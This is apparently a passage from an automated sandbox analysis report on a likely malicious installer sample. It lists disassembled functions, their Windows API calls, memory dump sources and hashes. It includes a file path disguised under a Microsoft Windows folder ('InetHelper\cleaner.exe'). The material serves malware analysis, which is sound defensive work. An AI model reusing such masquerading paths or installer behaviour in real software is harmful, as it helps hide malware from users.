                                                                                                                                                                                                                • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,0043E708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                                                                                                                                • Part of subcall function 00405450: lstrcatW.KERNEL32(0043E708,00402F08), ref: 004054AB
                                                                                                                                                                                                                • Part of subcall function 00405450: SetWindowTextW.USER32(0043E708,0043E708), ref: 004054BD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                                                                                                                                • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                                                                                                                                • Part of subcall function 004059D1: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0045E730,Error launching installer), ref: 004059FA
                                                                                                                                                                                                                • Part of subcall function 004059D1: CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                                                                                                • Part of subcall function 00406873: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406884
                                                                                                                                                                                                                • Part of subcall function 00406873: GetExitCodeProcess.KERNEL32(?,?), ref: 004068A6
                                                                                                                                                                                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$CloseProcesslstrlen$ChangeCodeCreateExitFindHandleNotificationObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1543427666-0
                                                                                                                                                                                                              • Opcode ID: c9c1a9aee45a533bc0b2c0b49cfc15e98268e4d9e70e071c0fafcc67442c1855
                                                                                                                                                                                                              • Instruction ID: acd8761c06f5a0ec48b5b4c4c323a9df4587fdbfc486ef5c68e798776a33b5ab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c9c1a9aee45a533bc0b2c0b49cfc15e98268e4d9e70e071c0fafcc67442c1855
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 37F09632906011D7CB20FBA189485DE77A49F40318B24417BF501B21D1CB7C4D419A6E
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00406283 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Create
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                                                              • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                              • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 0040345D Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                                                              • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                              • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                              Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                                                                                                                                                                                • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004057D7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                                                                                                              • CloseClipboard.USER32 ref: 00405912
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                              • String ID: (gD${
                                                                                                                                                                                                              • API String ID: 590372296-3503173740
                                                                                                                                                                                                              • Opcode ID: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction ID: c9c6b7b377eba0e4ba3b2f043119a7f49a951143ce35cdb84ba81c9eded025b4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9927c5c04afc45ce7243f23ce83da3be808d830e5e7dac2abc1f2713bef2e627
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F9B16A71800608FFDB11AFA0DD89AAE7B79FB48314F10817AFA45B61A0DB744E51DF68
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00404DCC Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F9), ref: 00404DE4
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000408), ref: 00404DEF
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404E39
                                                                                                                                                                                                              • LoadBitmapW.USER32(0000006E), ref: 00404E4C
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000FC,004053C4), ref: 00404E65
                                                                                                                                                                                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404E79
                                                                                                                                                                                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404E8B
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404EA1
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404EAD
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404EBF
                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 00404EC2
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404EED
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404EF9
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F8F
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404FBA
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404FCE
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404FFD
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040500B
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005), ref: 0040501C
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405119
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040517E
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405193
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004051B7
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004051D7
                                                                                                                                                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004051EC
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 004051FC
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405275
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001102,?,?), ref: 0040531E
                                                                                                                                                                                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040532D
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 0040534D
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 0040539B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FE), ref: 004053A6
                                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004053AD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                              • String ID: $M$N
                                                                                                                                                                                                              • API String ID: 1638840714-813528018
                                                                                                                                                                                                              • Opcode ID: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                              • Instruction ID: d2f35d8900002cfc25ccfd4abe259465259501dfb46309a939b5c4dc2546952f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2e47159a8ee18e206dd23a4901cc844ba6fc231fc2eeb5e404362fef1fcfc38e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45028CB0900609EFEB109F94CD85AAE7BB5FB44314F10817AF615BA2E1C7798E42DF58
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00404850 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                                                                                                                                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                                                                                                                                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                                                                                                                                                                                              • lstrcmpiW.KERNEL32("C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe",00446728,00000000,?,?), ref: 004049B7
                                                                                                                                                                                                              • lstrcatW.KERNEL32(?,"C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"), ref: 004049C3
                                                                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                                                                                                                                                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00002000,00404A0C), ref: 00405A45
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                                                                                                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,004D5000,004D5000,004C1000,00403480,004D5000,74DF3420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(004366F8,?,?,0000040F,?,004366F8,004366F8,?,00000001,004366F8,?,?,000003FB,?), ref: 00404A98
                                                                                                                                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                                                                                                                                                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00446728,00446728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                                                                                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                                                                                                                                                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00446728), ref: 00404CC9
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: "C:\Users\user\AppData\Local\Microsoft\Windows\InetHelper\cleaner.exe"$(gD$A
                                                                                                                                                                                                              • API String ID: 2624150263-1103393527
                                                                                                                                                                                                              • Opcode ID: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                              • Instruction ID: 9143468ab5d07659f3e28480ae0608f723924ccc95e3ca23e4c22bb38621839a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ce9fa2f80e2d72a36f4439ca0a9b4256237b791ea529c161ce0682b1aa97351d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 50A161B1900205ABDB11AFA6CD85AAF77B8EF84315F11803BF601B62D1D77C99418F6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00402104 Relevance: 1.6, APIs: 1, Instructions: 129comCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.0000000000412000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140970835.000000000045F000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2141110655.00000000004F1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_wnsA071.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateInstance
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 542301482-0
                                                                                                                                                                                                              • Opcode ID: 96344c3de5cfe15fcb011e91b90de0fab0478ac3d65f8d3cbce9a31fa6ce2af2
                                                                                                                                                                                                              • Instruction ID: 9bf21a461f45ca9ede348bf2f5d3e2a4fdca70f5c54a4bf8f8a9e28148a02939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 96344c3de5cfe15fcb011e91b90de0fab0478ac3d65f8d3cbce9a31fa6ce2af2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB414971A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E1DBB99981CB44
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403EDF
                                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403EF3
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404147
                                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404162
                                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
                                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                                                                                                                                                                                              • lstrlenW.KERNEL32(00446728,?,00446728,00000000), ref: 004041D4
                                                                                                                                                                                                              • SetWindowTextW.USER32(?,00446728), ref: 004041E8
                                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2140886037.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140858467.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2140905208.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
